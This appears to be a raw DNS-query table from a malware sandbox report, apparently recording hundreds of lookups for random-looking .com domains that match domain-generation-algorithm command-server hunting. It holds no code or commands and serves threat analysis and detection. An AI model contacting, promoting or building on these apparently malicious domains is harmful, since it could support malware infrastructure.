                                                                                                                                                                                                            Nov 11, 2024 18:07:42.156750917 CET192.168.2.91.1.1.10x2296Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.158482075 CET192.168.2.91.1.1.10xf64eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.231679916 CET192.168.2.91.1.1.10x1d4Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.241358995 CET192.168.2.91.1.1.10xa6eaStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.266320944 CET192.168.2.91.1.1.10x9f4aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.270433903 CET192.168.2.91.1.1.10x1dbaStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.274446964 CET192.168.2.91.1.1.10xbc03Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.277981043 CET192.168.2.91.1.1.10x52f2Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.279962063 CET192.168.2.91.1.1.10x91caStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.280005932 CET192.168.2.91.1.1.10xd6c3Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.280713081 CET192.168.2.91.1.1.10x3f3dStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.281086922 CET192.168.2.91.1.1.10xcd2cStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.281189919 CET192.168.2.91.1.1.10xea3cStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.281879902 CET192.168.2.91.1.1.10x4b5aStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.282071114 CET192.168.2.91.1.1.10x65d4Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.286005020 CET192.168.2.91.1.1.10x284bStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.287328005 CET192.168.2.91.1.1.10x5dd3Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.288208008 CET192.168.2.91.1.1.10xdd4cStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.288772106 CET192.168.2.91.1.1.10x2866Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.290394068 CET192.168.2.91.1.1.10x2f71Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.291125059 CET192.168.2.91.1.1.10xfa96Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.291671991 CET192.168.2.91.1.1.10xaf78Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.292188883 CET192.168.2.91.1.1.10x278fStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.293778896 CET192.168.2.91.1.1.10x2b3aStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.294861078 CET192.168.2.91.1.1.10x52feStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.295263052 CET192.168.2.91.1.1.10x4673Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.295488119 CET192.168.2.91.1.1.10xaef4Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.296849012 CET192.168.2.91.1.1.10xe1e9Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.296874046 CET192.168.2.91.1.1.10xee3fStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.297864914 CET192.168.2.91.1.1.10xa661Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.298459053 CET192.168.2.91.1.1.10xda2cStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.298482895 CET192.168.2.91.1.1.10xc0adStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.302589893 CET192.168.2.91.1.1.10xf403Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.303841114 CET192.168.2.91.1.1.10xd698Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.304371119 CET192.168.2.91.1.1.10xed35Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.304631948 CET192.168.2.91.1.1.10xa0bbStandard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.306767941 CET192.168.2.91.1.1.10x2e83Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.307203054 CET192.168.2.91.1.1.10x32d2Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.307492971 CET192.168.2.91.1.1.10x5da7Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.310039997 CET192.168.2.91.1.1.10xf839Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.310348034 CET192.168.2.91.1.1.10xc8b8Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.310717106 CET192.168.2.91.1.1.10xb16Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.312077999 CET192.168.2.91.1.1.10x5f57Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.312391996 CET192.168.2.91.1.1.10x5106Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.312753916 CET192.168.2.91.1.1.10x89cbStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.313245058 CET192.168.2.91.1.1.10x4bebStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.314194918 CET192.168.2.91.1.1.10xdbcStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.314707994 CET192.168.2.91.1.1.10xc659Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.314896107 CET192.168.2.91.1.1.10xe85aStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.315675974 CET192.168.2.91.1.1.10x6adfStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.317208052 CET192.168.2.91.1.1.10xc01dStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.739363909 CET192.168.2.91.1.1.10xe45Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742149115 CET192.168.2.91.1.1.10x5751Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742533922 CET192.168.2.91.1.1.10xec3fStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742682934 CET192.168.2.91.1.1.10x5516Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.749800920 CET192.168.2.91.1.1.10x6dd7Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.752110004 CET192.168.2.91.1.1.10x9a17Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.754708052 CET192.168.2.91.1.1.10x9960Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.755717993 CET192.168.2.91.1.1.10x99acStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.755928993 CET192.168.2.91.1.1.10x4852Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.756661892 CET192.168.2.91.1.1.10x1c6bStandard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.756948948 CET192.168.2.91.1.1.10xf6cdStandard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.757148027 CET192.168.2.91.1.1.10x56e0Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.757638931 CET192.168.2.91.1.1.10xf89fStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.758116961 CET192.168.2.91.1.1.10xa26bStandard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.758770943 CET192.168.2.91.1.1.10xb1e2Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.759073019 CET192.168.2.91.1.1.10x7303Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.760345936 CET192.168.2.91.1.1.10x86e5Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761281967 CET192.168.2.91.1.1.10xd25bStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761742115 CET192.168.2.91.1.1.10xf025Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762276888 CET192.168.2.91.1.1.10x2148Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762726068 CET192.168.2.91.1.1.10x9ea6Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762958050 CET192.168.2.91.1.1.10x1500Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763293982 CET192.168.2.91.1.1.10x684eStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763472080 CET192.168.2.91.1.1.10x1b30Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.605470896 CET192.168.2.91.1.1.10xa659Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.606380939 CET192.168.2.91.1.1.10x2cfaStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.607198000 CET192.168.2.91.1.1.10xed51Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609376907 CET192.168.2.91.1.1.10xd778Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609764099 CET192.168.2.91.1.1.10xe9c7Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.610735893 CET192.168.2.91.1.1.10x34d6Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612013102 CET192.168.2.91.1.1.10x2137Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612371922 CET192.168.2.91.1.1.10xf86bStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612509966 CET192.168.2.91.1.1.10xf37eStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612859964 CET192.168.2.91.1.1.10xb323Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612956047 CET192.168.2.91.1.1.10xb7b8Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.613688946 CET192.168.2.91.1.1.10x9078Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664427996 CET192.168.2.91.1.1.10xec11Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664993048 CET192.168.2.91.1.1.10x3656Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667336941 CET192.168.2.91.1.1.10x1703Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667813063 CET192.168.2.91.1.1.10xa691Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668025017 CET192.168.2.91.1.1.10x6672Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668553114 CET192.168.2.91.1.1.10xb58Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668803930 CET192.168.2.91.1.1.10x9acaStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669148922 CET192.168.2.91.1.1.10x1c32Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669482946 CET192.168.2.91.1.1.10xf028Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.686487913 CET192.168.2.91.1.1.10xda5bStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.698743105 CET192.168.2.91.1.1.10xbda1Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.703600883 CET192.168.2.91.1.1.10xaa8eStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704046011 CET192.168.2.91.1.1.10x7ad3Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704771996 CET192.168.2.91.1.1.10x93e7Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704962969 CET192.168.2.91.1.1.10xc868Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.723022938 CET192.168.2.91.1.1.10x2858Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.734762907 CET192.168.2.91.1.1.10x7dc8Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.736766100 CET192.168.2.91.1.1.10x386fStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737031937 CET192.168.2.91.1.1.10x6d78Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737163067 CET192.168.2.91.1.1.10xd12Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737251997 CET192.168.2.91.1.1.10xec5bStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737354040 CET192.168.2.91.1.1.10x414bStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737468958 CET192.168.2.91.1.1.10x3cf9Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737673998 CET192.168.2.91.1.1.10xaf3eStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737867117 CET192.168.2.91.1.1.10x3aa6Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738080978 CET192.168.2.91.1.1.10x8105Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738286018 CET192.168.2.91.1.1.10xe7b2Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738430977 CET192.168.2.91.1.1.10x21e5Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738815069 CET192.168.2.91.1.1.10x5828Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738847971 CET192.168.2.91.1.1.10xc41fStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739042997 CET192.168.2.91.1.1.10x237fStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739053965 CET192.168.2.91.1.1.10x16c6Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739233971 CET192.168.2.91.1.1.10xe19dStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739844084 CET192.168.2.91.1.1.10x3492Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741147995 CET192.168.2.91.1.1.10x9ceaStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741261005 CET192.168.2.91.1.1.10x2a07Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741435051 CET192.168.2.91.1.1.10x8392Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744285107 CET192.168.2.91.1.1.10x9ffStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744709015 CET192.168.2.91.1.1.10xb262Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744832993 CET192.168.2.91.1.1.10x7850Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744940996 CET192.168.2.91.1.1.10x66b9Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745057106 CET192.168.2.91.1.1.10x96e8Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745639086 CET192.168.2.91.1.1.10xfd5eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745755911 CET192.168.2.91.1.1.10x440cStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374003887 CET192.168.2.91.1.1.10xa08eStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374716043 CET192.168.2.91.1.1.10xbb2fStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.375857115 CET192.168.2.91.1.1.10x7a99Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.376441956 CET192.168.2.91.1.1.10xed72Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418620110 CET192.168.2.91.1.1.10xbf01Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418859005 CET192.168.2.91.1.1.10x2f09Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.425586939 CET192.168.2.91.1.1.10xbd98Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.426131010 CET192.168.2.91.1.1.10xcf5dStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.427726030 CET192.168.2.91.1.1.10x4bfeStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.428865910 CET192.168.2.91.1.1.10x319eStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.430289030 CET192.168.2.91.1.1.10x7f74Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.432332039 CET192.168.2.91.1.1.10x3339Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.434540987 CET192.168.2.91.1.1.10x4840Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.438990116 CET192.168.2.91.1.1.10xb5f2Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439493895 CET192.168.2.91.1.1.10x8738Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439718962 CET192.168.2.91.1.1.10x4daaStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.441971064 CET192.168.2.91.1.1.10x36c0Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.442141056 CET192.168.2.91.1.1.10xcc3fStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444097042 CET192.168.2.91.1.1.10x3232Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.450906992 CET192.168.2.91.1.1.10xcff3Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451344013 CET192.168.2.91.1.1.10x1785Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451513052 CET192.168.2.91.1.1.10xe437Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451710939 CET192.168.2.91.1.1.10xaf53Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451796055 CET192.168.2.91.1.1.10x42fbStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452353001 CET192.168.2.91.1.1.10x8bacStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.457989931 CET192.168.2.91.1.1.10x3a08Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.458561897 CET192.168.2.91.1.1.10x6695Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.467171907 CET192.168.2.91.1.1.10x8297Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.468549967 CET192.168.2.91.1.1.10x2432Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.475140095 CET192.168.2.91.1.1.10xba1bStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264070988 CET192.168.2.91.1.1.10xaebStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264446974 CET192.168.2.91.1.1.10x9ca9Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264978886 CET192.168.2.91.1.1.10xa62bStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264978886 CET192.168.2.91.1.1.10x96ccStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.370783091 CET192.168.2.91.1.1.10x4a71Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.372416973 CET192.168.2.91.1.1.10xc534Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.372926950 CET192.168.2.91.1.1.10xaebfStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373224020 CET192.168.2.91.1.1.10x472cStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373382092 CET192.168.2.91.1.1.10xb08eStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373733044 CET192.168.2.91.1.1.10x7f84Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.374108076 CET192.168.2.91.1.1.10x85faStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.374505997 CET192.168.2.91.1.1.10xea79Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.398982048 CET192.168.2.91.1.1.10x5d6aStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399553061 CET192.168.2.91.1.1.10x94b7Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399825096 CET192.168.2.91.1.1.10xb227Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399997950 CET192.168.2.91.1.1.10x917aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400207996 CET192.168.2.91.1.1.10x74fStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400650978 CET192.168.2.91.1.1.10x9247Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400871038 CET192.168.2.91.1.1.10x3963Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401118040 CET192.168.2.91.1.1.10x86f0Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401254892 CET192.168.2.91.1.1.10x7104Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401845932 CET192.168.2.91.1.1.10x1d2cStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
